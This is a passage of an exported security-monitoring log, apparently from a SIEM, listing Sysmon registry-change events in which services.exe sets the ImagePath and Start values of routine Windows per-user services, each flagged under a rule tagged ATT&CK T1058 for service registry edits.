service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.103682600Z"",""eventRecordID"":""588"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_37a6f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_37a6f\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:45:28.498",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.102212800Z"",""eventRecordID"":""587"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.473",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.102011800Z"",""eventRecordID"":""586"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.414",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.101163100Z"",""eventRecordID"":""585"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:45:28.401",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.100874300Z"",""eventRecordID"":""584"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.389",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.099734000Z"",""eventRecordID"":""583"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:45:28.365",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.099517800Z"",""eventRecordID"":""582"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.348",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.098612300Z"",""eventRecordID"":""581"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 26, 2020 @ 10:45:28.321",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.098361500Z"",""eventRecordID"":""580"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.303",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.097523500Z"",""eventRecordID"":""579"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 26, 2020 @ 10:45:28.285",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.097310900Z"",""eventRecordID"":""578"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.282",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.096528900Z"",""eventRecordID"":""577"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:45:28.232",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.096303500Z"",""eventRecordID"":""576"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.189",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.095451200Z"",""eventRecordID"":""575"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.129",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.095253100Z"",""eventRecordID"":""574"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_37a6f\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:45:28.115",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.094492900Z"",""eventRecordID"":""573"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 